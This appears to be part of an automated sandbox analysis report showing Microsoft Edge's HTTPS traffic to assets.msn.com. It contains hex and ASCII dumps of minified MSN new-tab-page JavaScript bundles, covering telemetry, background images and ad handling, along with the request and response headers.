                                                                                                                                                                                                                                                                                    Data Ascii: 6,r.b$,o.HD,o.hj,o.jn,o.mf,o.kJ,o.Kn,o.nd,r.MF,o.Y6,r.cp,s.p7,s.UY,o.l_,l.c9,l.Ib,o.Id,o.rW,o.Ym,o.o8,o.le,o.nr,o.mf,o.Kn,o.J_,o.kJ,o.VZ,o.HD,o.hj,o.jn,o.Y6,o.tO,o.UA,o.Mr,o.Xz,o.nd,d.pu,o.FY,o.l_,l.Ib,o.m6,r.w1,a.GW,a.Jj,u.pZ,u.az,u._l,u.CN,u.F6,a.DO;fun
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 34 33 39 38 0d 0a 65 5b 72 2e 4d 57 5d 28 61 29 2c 31 3d 3d 3d 65 3f 74 5b 63 2e 79 73 5d 28 73 29 3a 74 5b 63 2e 63 4c 5d 28 73 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 2c 6e 29 7b 76 61 72 20 69 3d 28 30 2c 6f 2e 6a 29 28 65 7c 7c 7b 7d 29 3b 69 26 26 69 5b 72 2e 6d 63 5d 26 26 69 5b 72 2e 6d 63 5d 28 74 2c 6e 29 7d 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 3d 28 30 2c 61 2e 76 34 29 28 74 2e 6c 6f 67 67 69 6e 67 4c 65 76 65 6c 43 6f 6e 73 6f 6c 65 2c 30 29 2c 6c 3d 28 30 2c 61 2e 76 34 29 28 74 2e 6c 6f 67 67 69 6e 67 4c 65 76 65 6c 54 65 6c 65 6d 65 74 72 79 2c 31 29 2c 68 3d 28 30 2c 61 2e 76 34 29 28 74 2e 6d 61 78 4d 65 73 73 61 67 65 4c 69 6d 69 74 2c 32 35 29 2c 66 3d 28 30 2c 61 2e 76 34 29 28 74 5b 72 2e 46 72 5d 2c 21 31 29
                                                                                                                                                                                                                                                                                    Data Ascii: 00004398e[r.MW](a),1===e?t[c.ys](s):t[c.cL](s)}}}function v(t,n){var i=(0,o.j)(e||{});i&&i[r.mc]&&i[r.mc](t,n)}!function(t){n=(0,a.v4)(t.loggingLevelConsole,0),l=(0,a.v4)(t.loggingLevelTelemetry,1),h=(0,a.v4)(t.maxMessageLimit,25),f=(0,a.v4)(t[r.Fr],!1)
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC932INData Raw: 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6f 2e 5f 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 65 26 26 65 2e 75 6e 6c 6f 61 64 28 61 2c 74 29 2c 21 65 7d 2c 61 5b 69 2e 7a 56 5d 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 6e 75 6c 6c 29 2c 28 30 2c 73 2e 6b 4a 29 28 74 29 26 26 28 74 3d 62 28 74 2c 72 2c 65 2c 6e 29 29 2c 76 28 74 7c 7c 61 5b 69 2e 57 32 5d 28 29 2c 65 2c 6e 29 7d 2c 61 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 65 5b 69 2e 54 43 5d 7c 7c 7b 7d 2c 6f 3d 70 28 74 2c 72 2c 65 2c 6e 29 2e 63 74 78 3b 72 65 74 75 72 6e 20 6f 5b 69 2e 75 4c 5d 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6f 2e 69 74 65 72 61 74 65 28 28 66
                                                                                                                                                                                                                                                                                    Data Ascii: unction(t){var e=o._next();return e&&e.unload(a,t),!e},a[i.zV]=function(t,n){return void 0===t&&(t=null),(0,s.kJ)(t)&&(t=b(t,r,e,n)),v(t||a[i.W2](),e,n)},a}function m(t,e,n){var r=e[i.TC]||{},o=p(t,r,e,n).ctx;return o[i.uL]=function(t){return o.iterate((f
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 64 5d 3b 72 65 74 75 72 6e 20 6d 7c 7c 28 6d 3d 65 5b 64 5d 3d 7b 7d 29 2c 65 2e 73 65 74 4e 65 78 74 28 76 29 2c 74 26 26 28 30 2c 63 2e 4c 6d 29 28 65 5b 61 2e 6f 56 5d 28 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 2b 22 3a 22 2b 73 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6d 5b 70 5d 3d 21 30 3b 74 72 79 7b 76 61 72 20 74 3d 76 3f 76 2e 5f 69 64 3a 61 2e 71 53 3b 74 26 26 28 6d 5b 74 5d 3d 21 31 29 2c 66 3d 6e 28 65 29 7d 63 61 74 63 68 28 74 29 7b 76 61 72 20 63 3d 21 76 7c 7c 6d 5b 76 2e 5f 69 64 5d 3b 63 26 26 28 66 3d 21 30 29 2c 76 26 26 63 7c 7c 28 30 2c 72 2e 6b 50 29 28 65 5b 69 2e 6d 63 5d 28 29 2c 31 2c 37 33 2c 22 50 6c 75 67 69 6e 20 5b 22 2b 67 2b 22 5d 20 66 61 69 6c 65 64 20 64 75
                                                                                                                                                                                                                                                                                    Data Ascii: 00004000d];return m||(m=e[d]={}),e.setNext(v),t&&(0,c.Lm)(e[a.oV](),(function(){return g+":"+s}),(function(){m[p]=!0;try{var t=v?v._id:a.qS;t&&(m[t]=!1),f=n(e)}catch(t){var c=!v||m[v._id];c&&(f=!0),v&&c||(0,r.kP)(e[i.mc](),1,73,"Plugin ["+g+"] failed du
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC12INData Raw: 54 79 70 65 5d 3b 21 76 74 28 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: Type];!vt(
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 65 2e 73 65 6e 64 54 79 70 65 29 26 26 65 2e 69 73 42 65 61 63 6f 6e 26 26 32 3d 3d 3d 65 2e 73 65 6e 64 52 65 61 73 6f 6e 26 26 28 67 3d 70 5b 32 5d 7c 7c 70 5b 33 5d 7c 7c 67 29 3b 76 61 72 20 76 3d 64 74 3b 28 65 2e 69 73 42 65 61 63 6f 6e 7c 7c 33 3d 3d 3d 67 2e 5f 74 72 61 6e 73 70 6f 72 74 29 26 26 28 76 3d 21 31 29 3b 76 61 72 20 6d 3d 6b 74 28 65 2c 76 29 3b 76 3d 76 7c 7c 6d 2e 75 73 65 48 64 72 73 3b 76 61 72 20 62 3d 28 30 2c 63 2e 68 4b 29 28 29 3b 28 30 2c 6f 2e 4c 6d 29 28 79 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 48 74 74 70 4d 61 6e 61 67 65 72 3a 5f 64 6f 50 61 79 6c 6f 61 64 53 65 6e 64 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 70 3d 30 3b 70 3c 65 2e 62 61
                                                                                                                                                                                                                                                                                    Data Ascii: 00004000e.sendType)&&e.isBeacon&&2===e.sendReason&&(g=p[2]||p[3]||g);var v=dt;(e.isBeacon||3===g._transport)&&(v=!1);var m=kt(e,v);v=v||m.useHdrs;var b=(0,c.hK)();(0,o.Lm)(y,(function(){return"HttpManager:_doPayloadSend"}),(function(){for(var p=0;p<e.ba
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC12INData Raw: 22 7c 22 29 3b 69 2e 6c 65 6e 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: "|");i.len
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC11402INData Raw: 30 30 30 30 32 43 37 45 0d 0a 67 74 68 3e 30 26 26 6e 2e 73 65 74 49 64 28 69 5b 30 5d 29 3b 74 72 79 7b 69 66 28 69 2e 6c 65 6e 67 74 68 3e 31 29 7b 76 61 72 20 72 3d 2b 69 5b 31 5d 3b 6e 2e 61 63 71 75 69 73 69 74 69 6f 6e 44 61 74 65 3d 2b 6e 65 77 20 44 61 74 65 28 72 29 2c 6e 2e 61 63 71 75 69 73 69 74 69 6f 6e 44 61 74 65 3d 6e 2e 61 63 71 75 69 73 69 74 69 6f 6e 44 61 74 65 3e 30 3f 6e 2e 61 63 71 75 69 73 69 74 69 6f 6e 44 61 74 65 3a 30 7d 69 66 28 69 2e 6c 65 6e 67 74 68 3e 32 29 7b 76 61 72 20 6f 3d 2b 69 5b 32 5d 3b 6e 2e 72 65 6e 65 77 61 6c 44 61 74 65 3d 2b 6e 65 77 20 44 61 74 65 28 6f 29 2c 6e 2e 72 65 6e 65 77 61 6c 44 61 74 65 3d 6e 2e 72 65 6e 65 77 61 6c 44 61 74 65 3e 30 3f 6e 2e 72 65 6e 65 77 61 6c 44 61 74 65 3a 30 7d 7d 63 61 74
                                                                                                                                                                                                                                                                                    Data Ascii: 00002C7Egth>0&&n.setId(i[0]);try{if(i.length>1){var r=+i[1];n.acquisitionDate=+new Date(r),n.acquisitionDate=n.acquisitionDate>0?n.acquisitionDate:0}if(i.length>2){var o=+i[2];n.renewalDate=+new Date(o),n.renewalDate=n.renewalDate>0?n.renewalDate:0}}cat
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 67 65 74 55 73 65 72 43 6f 6e 73 65 6e 74 44 65 74 61 69 6c 73 28 29 2c 6e 5b 34 5d 3d 69 2e 67 65 74 55 73 65 72 43 6f 6e 73 65 6e 74 28 29 2c 6e 29 2c 66 29 7d 2c 74 2e 61 70 70 6c 79 4f 73 43 6f 6e 74 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 69 3d 74 2e 6f 73 3b 71 74 28 35 2c 65 2c 46 2c 28 28 6e 3d 7b 7d 29 5b 30 5d 3d 69 2e 6e 61 6d 65 2c 6e 5b 31 5d 3d 69 2e 76 65 72 2c 6e 29 2c 66 29 7d 2c 74 2e 61 70 70 6c 79 53 64 6b 43 6f 6e 74 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 71 74 28 36 2c 74 2c 42 2c 28 28 65 3d 7b 7d 29 5b 32 5d 3d 72 2e 69 6e 73 74 61 6c 6c 49 64 2c 65 5b 31 5d 3d 72 2e 67 65 74 53 65 71 75 65 6e 63 65 49 64 28 29 2c 65 5b 33 5d 3d 72 2e 65 70 6f 63 68
                                                                                                                                                                                                                                                                                    Data Ascii: 00006000getUserConsentDetails(),n[4]=i.getUserConsent(),n),f)},t.applyOsContext=function(e){var n,i=t.os;qt(5,e,F,((n={})[0]=i.name,n[1]=i.ver,n),f)},t.applySdkContext=function(t){var e;qt(6,t,B,((e={})[2]=r.installId,e[1]=r.getSequenceId(),e[3]=r.epoch


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    11192.168.2.55001323.44.203.174434408C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:11 UTC626OUTGET /bundles/v1/edgeChromium/latest/common.0af827ee54246cc151b3.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: assets.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC1239INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                    Content-MD5: vGnEXkOq1p5Z4uHMtI2xzQ==
                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 21 Nov 2024 01:19:38 GMT
                                                                                                                                                                                                                                                                                    ETag: 0x8DD09CA9180AED4
                                                                                                                                                                                                                                                                                    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    x-ms-request-id: 5e9f4455-c01e-0036-58b3-3b360d000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:12 GMT
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    Akamai-Request-BC: [a=23.195.36.240,b=690613753,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                                    Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                    Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                    Akamai-Server-IP: 23.195.36.240
                                                                                                                                                                                                                                                                                    Akamai-Request-ID: 2929edf9
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                    Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Akamai-GRN: 0.f024c317.1732223592.2929edf9
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC15145INData Raw: 30 30 30 30 36 30 30 30 0d 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 63 6f 6d 6d 6f 6e 22 5d 2c 7b 33 36 37 37 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 46 76 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 67 51 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 63 6f 6e 73 74 20 69 3d 22 73 65 6c 65 63 74 65 64 4e 61 76 49 74 65 6d 43 6c 69 63 6b 65 64 22 3b 63 6c 61 73 73 20 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 74 68 69 73 2e 73 75 70 70 6f 72 74
                                                                                                                                                                                                                                                                                    Data Ascii: 00006000(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks||[]).push([["common"],{36777:function(e,t,n){"use strict";n.d(t,{Fv:function(){return r},gQ:function(){return i}});const i="selectedNavItemClicked";class r{constructor(){this.support
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC9443INData Raw: 61 67 65 55 52 4c 28 65 29 7b 76 61 72 20 74 2c 6e 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 68 69 73 2e 63 6f 6e 66 69 67 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 21 74 2e 64 61 74 61 5b 65 5d 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 63 6f 6e 73 74 20 69 3d 6e 75 6c 6c 3d 3d 3d 28 6e 3d 74 68 69 73 2e 63 6f 6e 66 69 67 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 64 61 74 61 5b 65 5d 2e 69 6d 61 67 65 5b 60 69 24 7b 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 6f 6c 75 74 69 6f 6e 7d 60 5d 3b 72 65 74 75 72 6e 28 74 68 69 73 2e 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 57 43 2e 63 6f 6e 66 69 67 2e 65 6e 61 62 6c 65 53 74 61 74 69 63 49 6d 61 67 65 73 3f 28 30 2c 44 2e 62 66 29 28 60 69 6d 61 67 65 24 7b 65 7d 60 29 3a 44
                                                                                                                                                                                                                                                                                    Data Ascii: ageURL(e){var t,n;if(null===(t=this.config)||void 0===t||!t.data[e])return null;const i=null===(n=this.config)||void 0===n?void 0:n.data[e].image[`i${this.currentResolution}`];return(this.backgroundImageWC.config.enableStaticImages?(0,D.bf)(`image${e}`):D
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 67 64 22 2c 7b 64 65 74 61 69 6c 3a 7b 69 73 4c 6f 77 45 6e 64 44 65 76 69 63 65 3a 21 31 7d 7d 29 29 2c 74 68 69 73 2e 69 73 46 52 45 26 26 74 68 69 73 2e 63 6f 6e 66 69 67 2e 64 69 73 61 62 6c 65 47 61 6c 6c 65 72 79 46 52 45 41 6e 64 4c 6f 77 45 6e 64 29 7b 74 68 69 73 2e 63 75 72 72 65 6e 74 50 72 6f 76 69 64 65 72 3d 22 46 52 45 42 61 63 6b 67 72 6f 75 6e 64 22 3b 62 72 65 61 6b 7d 69 66 28 74 68 69 73 2e 62 61 63 6b 67 72 6f 75 6e 64 47 61 6c 6c 65 72 79 45 6c 69 67 69 62 69 6c 69 74 79 26 26 74 68 69 73 2e 67 61 6c 6c 65 72 79 42 61 63 6b 67 72 6f 75 6e 64 53 65 6c 65 63 74 69 6f 6e 4d 65 74 61 64 61 74 61 29 7b 69 66 28 22 43 4d 53 49 6d 61 67 65 22 3d 3d 3d 74 68 69 73 2e 67 61 6c 6c 65 72 79 42 61 63 6b 67 72 6f 75
                                                                                                                                                                                                                                                                                    Data Ascii: 00006000gd",{detail:{isLowEndDevice:!1}})),this.isFRE&&this.config.disableGalleryFREAndLowEnd){this.currentProvider="FREBackground";break}if(this.backgroundGalleryEligibility&&this.galleryBackgroundSelectionMetadata){if("CMSImage"===this.galleryBackgrou
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC8204INData Raw: 41 64 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 74 69 74 6c 65 2c 69 64 3a 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 68 69 73 2e 6d 61 72 71 75 65 65 41 64 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 63 6c 69 63 6b 54 68 72 6f 75 67 68 55 72 6c 7d 7d 29 2e 67 65 74 4d 65 74 61 64 61 74 61 54 61 67 28 29 2c 74 68 69 73 2e 74 65 6c 65 6d 65 74 72 79 54 61 67 73 2e 6d 61 72 71 75 65 65 41 64 43 54 41 42 75 74 74 6f 6e 3d 74 68 69 73 2e 74 65 6c 65 6d 65 74 72 79 4f 62 6a 65 63 74 2e 61 64 64 4f 72 55 70 64 61 74 65 43 68 69 6c 64 28 7b 6e 61 6d 65 3a 22 4d 61 72 71 75 65 65 41 64 43 54 41 42 75 74 74 6f 6e 22 2c 74 79 70 65 3a 54 2e 63 39 2e 49 6e 74 65 72 61 63 74 69 6f 6e 2c 62 65 68 61 76 69 6f 72 3a 54 2e 77 75
                                                                                                                                                                                                                                                                                    Data Ascii: Ad)||void 0===e?void 0:e.title,id:null===(t=this.marqueeAd)||void 0===t?void 0:t.clickThroughUrl}}).getMetadataTag(),this.telemetryTags.marqueeAdCTAButton=this.telemetryObject.addOrUpdateChild({name:"MarqueeAdCTAButton",type:T.c9.Interaction,behavior:T.wu
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 3f 76 6f 69 64 20 30 3a 65 2e 70 72 6f 70 65 72 74 69 65 73 3b 69 66 28 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6c 65 6e 67 74 68 29 3e 30 26 26 6e 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 65 29 7b 63 6f 6e 73 74 20 74 3d 22 45 72 72 6f 72 20 69 6e 20 67 65 74 74 69 6e 67 20 77 70 6f 20 65 76 65 6e 74 20 67 6c 65 61 6d 20 64 61 74 61 22 3b 28 30 2c 6f 2e 48 29 28 72 2e 4f 64 35 2c 74 2c 60 65 72 72 6f 72 3a 24 7b 65 7d 60 29 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 28 29 29 2c 74 68 69 73 2e 63 68 72 6f 6d 69 75 6d 50 61 67 65 53 65 74 74 69 6e 67 73 43 6f 6e 6e 65 63 74 6f 72 3d 28 30 2c 57 2e 4b 30 29 28 6c 2e 52 4c 29 2c 74 68 69 73 2e 69 73 44 61 72 6b 4d 6f 64 65 3d 28 30 2c 59 2e 59 29 28 29 2c 74 68
                                                                                                                                                                                                                                                                                    Data Ascii: 00004000?void 0:e.properties;if((null==t?void 0:t.length)>0&&n)return n}catch(e){const t="Error in getting wpo event gleam data";(0,o.H)(r.Od5,t,`error:${e}`)}return null}()),this.chromiumPageSettingsConnector=(0,W.K0)(l.RL),this.isDarkMode=(0,Y.Y)(),th
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC12INData Raw: 63 6b 5f 4d 61 72 71 75 65 65 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: ck_Marquee
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 41 64 28 74 68 69 73 2e 72 65 66 5f 6d 61 72 71 75 65 65 41 64 53 70 6f 6e 73 6f 72 4c 6f 67 6f 29 7d 61 73 79 6e 63 20 6f 6e 43 6c 69 63 6b 5f 4d 61 72 71 75 65 65 41 64 28 65 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 74 68 69 73 2e 6d 61 72 71 75 65 65 41 64 2e 63 6c 69 63 6b 54 68 72 6f 75 67 68 55 72 6c 2c 22 5f 62 6c 61 6e 6b 22 29 2e 66 6f 63 75 73 28 29 2c 61 77 61 69 74 20 73 65 2e 6f 2e 73 65 6e 64 42 65 61 63 6f 6e 73 28 74 68 69 73 2e 6d 61 72 71 75 65 65 41 64 2e 61 64 43 6c 69 63 6b 65 64 55 72 6c 73 29 2c 6b 2e 4d 30 2e 73 65 6e 64 41 63 74 69 6f 6e 45 76 65 6e 74 28 65 2c 54 2e 41 77 2e 43 6c 69 63 6b 2c 54 2e 77 75 2e 4e 61 76 69 67 61 74 65 29 7d 67 65 74 53 74 79 6c 65 46 6f 72 45 6c 65 6d 65 6e 74 4b 65 79
                                                                                                                                                                                                                                                                                    Data Ascii: 00004000Ad(this.ref_marqueeAdSponsorLogo)}async onClick_MarqueeAd(e){window.open(this.marqueeAd.clickThroughUrl,"_blank").focus(),await se.o.sendBeacons(this.marqueeAd.adClickedUrls),k.M0.sendActionEvent(e,T.Aw.Click,T.wu.Navigate)}getStyleForElementKey
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC12INData Raw: 6c 6f 72 3a 72 67 62 61 28 30 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: lor:rgba(0
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 2c 30 2c 30 2c 30 2e 36 34 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 36 70 78 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 3b 68 65 69 67 68 74 3a 33 32 70 78 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 38 70 78 3b 77 69 64 74 68 3a 33 32 70 78 7d 2e 68 6f 74 53 70 6f 74 53 75 62 54 65 78 74 41 72 65 61 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 2e 37 34 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 68 6f 74 53 70 6f 74 53 75 62 54 65 78 74 41 72 65 61 3a 68 6f 76 65 72 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 68 6f 74 53 70 6f 74 54 65 78 74 41 72 65 61 7b 62 6f 72 64 65 72 2d 72 61 64 69
                                                                                                                                                                                                                                                                                    Data Ascii: 00004000,0,0,0.64);border-radius:16px;cursor:default;height:32px;margin-inline-end:8px;width:32px}.hotSpotSubTextArea{color:rgba(255,255,255,0.74);font-size:12px;line-height:16px;opacity:0}.hotSpotSubTextArea:hover{opacity:1}.hotSpotTextArea{border-radi
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC12INData Raw: 79 6c 65 3d 74 68 69 73 2e 63 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: yle=this.c


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    12192.168.2.55001523.44.203.174434408C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:11 UTC630OUTGET /bundles/v1/edgeChromium/latest/experience.b23f2c737ccf14018cf8.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: assets.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC1239INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                    Content-MD5: 0k/Kzb2pATSOyG1Ifkp6Gg==
                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 21 Nov 2024 01:19:38 GMT
                                                                                                                                                                                                                                                                                    ETag: 0x8DD09CA91B2356E
                                                                                                                                                                                                                                                                                    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    x-ms-request-id: a6af521c-b01e-00b6-45b3-3b8019000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:12 GMT
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    Akamai-Request-BC: [a=23.195.36.239,b=707689373,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                                    Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
